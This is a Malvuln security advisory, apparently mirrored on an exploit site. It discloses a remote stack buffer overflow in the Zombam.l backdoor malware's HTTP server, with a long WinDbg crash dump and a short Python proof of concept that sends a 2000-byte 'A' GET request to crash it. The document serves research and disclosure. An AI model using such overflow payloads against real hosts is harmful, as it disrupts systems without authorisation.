Exploit for Backdoor.Win32.Zombam.l Buffer Overflow

Name: Exploit for Backdoor.Win32.Zombam.l Buffer Overflow
Rating: 5 (150 reviews)
2021-03-14 | CVSS 0.7
## https://sploitus.com/exploit?id=PACKETSTORM:161780
Discovery / credits: Malvuln - malvuln.com (c) 2021  
Original source: https://malvuln.com/advisory/56d356c5b1ae3a91caac511179159034.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln  
  
Threat: Backdoor.Win32.Zombam.l  
Vulnerability: Remote Stack Buffer Overflow  
Description: Zombam.l creates files to serve as backdoors the default name is "httpserver.exe" and listens on TCP port 80. Attackers who can reach the backdoor can send HTTP GET request of about 2000 bytes to trigger buffer overflow corrupting the stack and overwriting EDX register.  
Type: PE32  
MD5: 56d356c5b1ae3a91caac511179159034  
Vuln ID: MVID-2021-0129  
Dropped files: httpserver.exe  
ASLR: False  
DEP: False  
Safe SEH: True  
Disclosure: 03/14/2021   
  
Memory Dump:  
(d00.168): Access violation - code c0000005 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=027cfa20 edx=41414141 esi=00000003 edi=00000003  
eip=7710ed3c esp=027cf0bc ebp=027cf24c iopl=0 nv up ei pl nz na po nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202  
ntdll!ZwWaitForMultipleObjects+0xc:  
7710ed3c c21400 ret 14h  
  
0:005> .ecxr  
eax=027cf9f0 ebx=04190310 ecx=027cfa20 edx=41414141 esi=04190310 edi=004057e6  
eip=004029e0 esp=027cf9d8 ebp=027cfa28 iopl=0 nv up ei pl zr na pe nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246  
*** WARNING: Unable to verify checksum for httpserver.exe  
*** ERROR: Module load completed but symbols could not be loaded for httpserver.exe  
httpserver+0x29e0:  
004029e0 8b4204 mov eax,dword ptr [edx+4] ds:002b:41414145=????????  
  
0:005> !analyze -v  
*******************************************************************************  
* *  
* Exception Analysis *  
* *  
*******************************************************************************  
  
Failed calling InternetOpenUrl, GLE=12029  
  
FAULTING_IP:   
httpserver+29e0  
004029e0 8b4204 mov eax,dword ptr [edx+4]  
  
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)  
ExceptionAddress: 004029e0 (httpserver+0x000029e0)  
ExceptionCode: c0000005 (Access violation)  
ExceptionFlags: 00000000  
NumberParameters: 2  
Parameter[0]: 00000000  
Parameter[1]: 41414145  
Attempt to read from address 41414145  
  
PROCESS_NAME: httpserver.exe  
  
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.  
  
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.  
  
EXCEPTION_PARAMETER1: 00000000  
  
EXCEPTION_PARAMETER2: 41414145  
  
READ_ADDRESS: 41414145   
  
FOLLOWUP_IP:   
httpserver+29e0  
004029e0 8b4204 mov eax,dword ptr [edx+4]  
  
MOD_LIST: <ANALYSIS/>  
  
NTGLOBALFLAG: 0  
  
APPLICATION_VERIFIER_FLAGS: 0  
  
FAULTING_THREAD: 00000168  
  
BUGCHECK_STR: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141  
  
PRIMARY_PROBLEM_CLASS: STRING_DEREFERENCE_FILL_PATTERN_41414141  
  
DEFAULT_BUCKET_ID: STRING_DEREFERENCE_FILL_PATTERN_41414141  
  
LAST_CONTROL_TRANSFER: from 00402574 to 004029e0  
  
STACK_TEXT:   
WARNING: Stack unwind information not available. Following frames may be wrong.  
027cfa28 00402574 41414141 027cfa40 00000415 httpserver+0x29e0  
027cfaa4 41414141 41414141 41414141 41414141 httpserver+0x2574  
027cfaa8 41414141 41414141 41414141 41414141 0x41414141  
027cfaac 41414141 41414141 41414141 41414141 0x41414141  
027cfab0 41414141 41414141 41414141 41414141 0x41414141  
027cfab4 41414141 41414141 41414141 41414141 0x41414141  
027cfab8 41414141 41414141 41414141 41414141 0x41414141  
027cfabc 41414141 41414141 41414141 41414141 0x41414141  
027cfac0 41414141 41414141 41414141 41414141 0x41414141  
027cfac4 41414141 41414141 41414141 41414141 0x41414141  
027cfac8 41414141 41414141 41414141 41414141 0x41414141  
027cfacc 41414141 41414141 41414141 41414141 0x41414141  
027cfad0 41414141 41414141 41414141 41414141 0x41414141  
027cfad4 41414141 41414141 41414141 41414141 0x41414141  
027cfad8 41414141 41414141 41414141 41414141 0x41414141  
027cfadc 41414141 41414141 41414141 41414141 0x41414141  
027cfae0 41414141 41414141 41414141 41414141 0x41414141  
027cfae4 41414141 41414141 41414141 41414141 0x41414141  
027cfae8 41414141 41414141 41414141 41414141 0x41414141  
027cfaec 41414141 41414141 41414141 41414141 0x41414141  
027cfaf0 41414141 41414141 41414141 41414141 0x41414141  
027cfaf4 41414141 41414141 41414141 41414141 0x41414141  
027cfaf8 41414141 41414141 41414141 41414141 0x41414141  
027cfafc 41414141 41414141 41414141 41414141 0x41414141  
027cfb00 41414141 41414141 41414141 41414141 0x41414141  
027cfb04 41414141 41414141 41414141 41414141 0x41414141  
027cfb08 41414141 41414141 41414141 41414141 0x41414141  
027cfb0c 41414141 41414141 41414141 41414141 0x41414141  
027cfb10 41414141 41414141 41414141 41414141 0x41414141  
027cfb14 41414141 41414141 41414141 41414141 0x41414141  
027cfb18 41414141 41414141 41414141 41414141 0x41414141  
027cfb1c 41414141 41414141 41414141 41414141 0x41414141  
027cfb20 41414141 41414141 41414141 41414141 0x41414141  
027cfb24 41414141 41414141 41414141 41414141 0x41414141  
027cfb28 41414141 41414141 41414141 41414141 0x41414141  
027cfb2c 41414141 41414141 41414141 41414141 0x41414141  
027cfb30 41414141 41414141 41414141 41414141 0x41414141  
027cfb34 41414141 41414141 41414141 41414141 0x41414141  
027cfb38 41414141 41414141 41414141 41414141 0x41414141  
027cfb3c 41414141 41414141 41414141 41414141 0x41414141  
027cfb40 41414141 41414141 41414141 41414141 0x41414141  
027cfb44 41414141 41414141 41414141 41414141 0x41414141  
027cfb48 41414141 41414141 41414141 41414141 0x41414141  
027cfb4c 41414141 41414141 41414141 41414141 0x41414141  
027cfb50 41414141 41414141 41414141 41414141 0x41414141  
027cfb54 41414141 41414141 41414141 41414141 0x41414141  
027cfb58 41414141 41414141 41414141 41414141 0x41414141  
027cfb5c 41414141 41414141 41414141 41414141 0x41414141  
027cfb60 41414141 41414141 41414141 41414141 0x41414141  
027cfb64 41414141 41414141 41414141 41414141 0x41414141  
027cfb68 41414141 41414141 41414141 41414141 0x41414141  
027cfb6c 41414141 41414141 41414141 41414141 0x41414141  
027cfb70 41414141 41414141 41414141 41414141 0x41414141  
027cfb74 41414141 41414141 41414141 41414141 0x41414141  
027cfb78 41414141 41414141 41414141 41414141 0x41414141  
027cfb7c 41414141 41414141 41414141 41414141 0x41414141  
027cfb80 41414141 41414141 41414141 41414141 0x41414141  
027cfb84 41414141 41414141 41414141 41414141 0x41414141  
027cfb88 41414141 41414141 41414141 41414141 0x41414141  
027cfb8c 41414141 41414141 41414141 41414141 0x41414141  
027cfb90 41414141 41414141 41414141 41414141 0x41414141  
027cfb94 41414141 41414141 41414141 41414141 0x41414141  
027cfb98 41414141 41414141 41414141 41414141 0x41414141  
027cfb9c 41414141 41414141 41414141 41414141 0x41414141  
027cfba0 41414141 41414141 41414141 41414141 0x41414141  
027cfba4 41414141 41414141 41414141 41414141 0x41414141  
027cfba8 41414141 41414141 41414141 41414141 0x41414141  
027cfbac 41414141 41414141 41414141 41414141 0x41414141  
027cfbb0 41414141 41414141 41414141 41414141 0x41414141  
027cfbb4 41414141 41414141 41414141 41414141 0x41414141  
027cfbb8 41414141 41414141 41414141 41414141 0x41414141  
027cfbbc 41414141 41414141 41414141 41414141 0x41414141  
027cfbc0 41414141 41414141 41414141 41414141 0x41414141  
027cfbc4 41414141 41414141 41414141 41414141 0x41414141  
027cfbc8 41414141 41414141 41414141 41414141 0x41414141  
027cfbcc 41414141 41414141 41414141 41414141 0x41414141  
027cfbd0 41414141 41414141 41414141 41414141 0x41414141  
027cfbd4 41414141 41414141 41414141 41414141 0x41414141  
027cfbd8 41414141 41414141 41414141 41414141 0x41414141  
027cfbdc 41414141 41414141 41414141 41414141 0x41414141  
027cfbe0 41414141 41414141 41414141 41414141 0x41414141  
027cfbe4 41414141 41414141 41414141 41414141 0x41414141  
027cfbe8 41414141 41414141 41414141 41414141 0x41414141  
027cfbec 41414141 41414141 41414141 41414141 0x41414141  
027cfbf0 41414141 41414141 41414141 41414141 0x41414141  
027cfbf4 41414141 41414141 41414141 41414141 0x41414141  
027cfbf8 41414141 41414141 41414141 41414141 0x41414141  
027cfbfc 41414141 41414141 41414141 41414141 0x41414141  
027cfc00 41414141 41414141 41414141 41414141 0x41414141  
027cfc04 41414141 41414141 41414141 41414141 0x41414141  
027cfc08 41414141 41414141 41414141 41414141 0x41414141  
027cfc0c 41414141 41414141 41414141 41414141 0x41414141  
027cfc10 41414141 41414141 41414141 41414141 0x41414141  
027cfc14 41414141 41414141 41414141 41414141 0x41414141  
027cfc18 41414141 41414141 41414141 41414141 0x41414141  
027cfc1c 41414141 41414141 41414141 41414141 0x41414141  
027cfc20 41414141 41414141 41414141 41414141 0x41414141  
027cfc24 41414141 41414141 41414141 41414141 0x41414141  
027cfc28 41414141 41414141 41414141 41414141 0x41414141  
027cfc2c 41414141 41414141 41414141 41414141 0x41414141  
027cfc30 41414141 41414141 41414141 41414141 0x41414141  
027cfc34 41414141 41414141 41414141 41414141 0x41414141  
027cfc38 41414141 41414141 41414141 41414141 0x41414141  
027cfc3c 41414141 41414141 41414141 41414141 0x41414141  
027cfc40 41414141 41414141 41414141 41414141 0x41414141  
027cfc44 41414141 41414141 41414141 41414141 0x41414141  
027cfc48 41414141 41414141 41414141 41414141 0x41414141  
027cfc4c 41414141 41414141 41414141 41414141 0x41414141  
027cfc50 41414141 41414141 41414141 41414141 0x41414141  
027cfc54 41414141 41414141 41414141 41414141 0x41414141  
027cfc58 41414141 41414141 41414141 41414141 0x41414141  
027cfc5c 41414141 41414141 41414141 41414141 0x41414141  
027cfc60 41414141 41414141 41414141 41414141 0x41414141  
027cfc64 41414141 41414141 41414141 41414141 0x41414141  
027cfc68 41414141 41414141 41414141 41414141 0x41414141  
027cfc6c 41414141 41414141 41414141 41414141 0x41414141  
027cfc70 41414141 41414141 41414141 41414141 0x41414141  
027cfc74 41414141 41414141 41414141 41414141 0x41414141  
027cfc78 41414141 41414141 41414141 41414141 0x41414141  
027cfc7c 41414141 41414141 41414141 41414141 0x41414141  
027cfc80 41414141 41414141 41414141 41414141 0x41414141  
027cfc84 41414141 41414141 41414141 41414141 0x41414141  
027cfc88 41414141 41414141 41414141 41414141 0x41414141  
027cfc8c 41414141 41414141 41414141 41414141 0x41414141  
027cfc90 41414141 41414141 41414141 41414141 0x41414141  
027cfc94 41414141 41414141 41414141 41414141 0x41414141  
027cfc98 41414141 41414141 41414141 41414141 0x41414141  
027cfc9c 41414141 41414141 41414141 41414141 0x41414141  
027cfca0 41414141 41414141 41414141 41414141 0x41414141  
027cfca4 41414141 41414141 41414141 41414141 0x41414141  
027cfca8 41414141 41414141 41414141 41414141 0x41414141  
027cfcac 41414141 41414141 41414141 41414141 0x41414141  
027cfcb0 41414141 41414141 41414141 41414141 0x41414141  
027cfcb4 41414141 41414141 41414141 41414141 0x41414141  
027cfcb8 41414141 41414141 41414141 41414141 0x41414141  
027cfcbc 41414141 41414141 41414141 41414141 0x41414141  
027cfcc0 41414141 41414141 41414141 41414141 0x41414141  
027cfcc4 41414141 41414141 41414141 41414141 0x41414141  
027cfcc8 41414141 41414141 41414141 41414141 0x41414141  
027cfccc 41414141 41414141 41414141 41414141 0x41414141  
027cfcd0 41414141 41414141 41414141 41414141 0x41414141  
027cfcd4 41414141 41414141 41414141 41414141 0x41414141  
027cfcd8 41414141 41414141 41414141 41414141 0x41414141  
027cfcdc 41414141 41414141 41414141 41414141 0x41414141  
027cfce0 41414141 41414141 41414141 41414141 0x41414141  
027cfce4 41414141 41414141 41414141 41414141 0x41414141  
027cfce8 41414141 41414141 41414141 41414141 0x41414141  
027cfcec 41414141 41414141 41414141 41414141 0x41414141  
027cfcf0 41414141 41414141 41414141 41414141 0x41414141  
027cfcf4 41414141 41414141 41414141 41414141 0x41414141  
027cfcf8 41414141 41414141 41414141 41414141 0x41414141  
027cfcfc 41414141 41414141 41414141 41414141 0x41414141  
027cfd00 41414141 41414141 41414141 41414141 0x41414141  
027cfd04 41414141 41414141 41414141 41414141 0x41414141  
027cfd08 41414141 41414141 41414141 41414141 0x41414141  
027cfd0c 41414141 41414141 41414141 41414141 0x41414141  
027cfd10 41414141 41414141 41414141 41414141 0x41414141  
027cfd14 41414141 41414141 41414141 41414141 0x41414141  
027cfd18 41414141 41414141 41414141 41414141 0x41414141  
027cfd1c 41414141 41414141 41414141 41414141 0x41414141  
027cfd20 41414141 41414141 41414141 41414141 0x41414141  
027cfd24 41414141 41414141 41414141 41414141 0x41414141  
027cfd28 41414141 41414141 41414141 41414141 0x41414141  
027cfd2c 41414141 41414141 41414141 41414141 0x41414141  
027cfd30 41414141 41414141 41414141 41414141 0x41414141  
027cfd34 41414141 41414141 41414141 41414141 0x41414141  
027cfd38 41414141 41414141 41414141 41414141 0x41414141  
027cfd3c 41414141 41414141 41414141 41414141 0x41414141  
027cfd40 41414141 41414141 41414141 41414141 0x41414141  
027cfd44 41414141 41414141 41414141 41414141 0x41414141  
027cfd48 41414141 41414141 41414141 41414141 0x41414141  
027cfd4c 41414141 41414141 41414141 41414141 0x41414141  
027cfd50 41414141 41414141 41414141 41414141 0x41414141  
027cfd54 41414141 41414141 41414141 41414141 0x41414141  
027cfd58 41414141 41414141 41414141 41414141 0x41414141  
027cfd5c 41414141 41414141 41414141 41414141 0x41414141  
027cfd60 41414141 41414141 41414141 41414141 0x41414141  
027cfd64 41414141 41414141 41414141 41414141 0x41414141  
027cfd68 41414141 41414141 41414141 41414141 0x41414141  
027cfd6c 41414141 41414141 41414141 41414141 0x41414141  
027cfd70 41414141 41414141 41414141 41414141 0x41414141  
027cfd74 41414141 41414141 41414141 41414141 0x41414141  
027cfd78 41414141 41414141 41414141 41414141 0x41414141  
027cfd7c 41414141 41414141 41414141 41414141 0x41414141  
027cfd80 41414141 41414141 41414141 41414141 0x41414141  
027cfd84 41414141 41414141 41414141 41414141 0x41414141  
027cfd88 41414141 41414141 41414141 41414141 0x41414141  
027cfd8c 41414141 41414141 41414141 41414141 0x41414141  
027cfd90 41414141 41414141 41414141 41414141 0x41414141  
027cfd94 41414141 41414141 41414141 41414141 0x41414141  
027cfd98 41414141 41414141 41414141 41414141 0x41414141  
027cfd9c 41414141 41414141 41414141 41414141 0x41414141  
027cfda0 41414141 41414141 41414141 41414141 0x41414141  
027cfda4 41414141 41414141 41414141 41414141 0x41414141  
027cfda8 41414141 41414141 41414141 41414141 0x41414141  
027cfdac 41414141 41414141 41414141 41414141 0x41414141  
027cfdb0 41414141 41414141 41414141 41414141 0x41414141  
027cfdb4 41414141 41414141 41414141 41414141 0x41414141  
027cfdb8 41414141 41414141 41414141 41414141 0x41414141  
027cfdbc 41414141 41414141 41414141 41414141 0x41414141  
027cfdc0 41414141 41414141 41414141 41414141 0x41414141  
027cfdc4 41414141 41414141 41414141 41414141 0x41414141  
027cfdc8 41414141 41414141 41414141 41414141 0x41414141  
027cfdcc 41414141 41414141 41414141 41414141 0x41414141  
027cfdd0 41414141 41414141 41414141 41414141 0x41414141  
027cfdd4 41414141 41414141 41414141 41414141 0x41414141  
027cfdd8 41414141 41414141 41414141 41414141 0x41414141  
027cfddc 41414141 41414141 41414141 41414141 0x41414141  
027cfde0 41414141 41414141 41414141 41414141 0x41414141  
027cfde4 41414141 41414141 41414141 41414141 0x41414141  
027cfde8 41414141 41414141 41414141 41414141 0x41414141  
027cfdec 41414141 41414141 41414141 41414141 0x41414141  
027cfdf0 41414141 41414141 41414141 41414141 0x41414141  
027cfdf4 41414141 41414141 41414141 41414141 0x41414141  
027cfdf8 41414141 41414141 41414141 41414141 0x41414141  
027cfdfc 41414141 41414141 41414141 41414141 0x41414141  
027cfe00 41414141 41414141 41414141 41414141 0x41414141  
027cfe04 41414141 41414141 41414  
  
STACK_COMMAND: ~5s; .ecxr ; kb  
  
SYMBOL_STACK_INDEX: 0  
  
SYMBOL_NAME: httpserver+29e0  
  
FOLLOWUP_NAME: MachineOwner  
  
MODULE_NAME: httpserver  
  
IMAGE_NAME: httpserver.exe  
  
DEBUG_FLR_IMAGE_TIMESTAMP: 3f0668f2  
  
FAILURE_BUCKET_ID: STRING_DEREFERENCE_FILL_PATTERN_41414141_c0000005_httpserver.exe!Unknown  
  
BUCKET_ID: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141_httpserver+29e0  
  
  
Exploit/PoC:  
from socket import *  
  
MALWARE_HOST="x.x.x.x"  
PORT=80  
  
def doit():  
  
s=socket(AF_INET, SOCK_STREAM)  
s.connect((MALWARE_HOST, PORT))  
  
JUNK="A"*2000   
PAYLOAD="GET /"+JUNK+" HTTP/1.0\r\nHost: "+MALWARE_HOST+"\r\n\r\n"  
  
s.send(PAYLOAD)  
s.close()  
  
print("Backdoor.Win32.Zombam.l / Remote Stack Buffer Overflow")  
print("MD5: 56d356c5b1ae3a91caac511179159034")  
print("BY Malvuln")  
  
  
if __name__=="__main__":  
doit()  
  
  
  
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).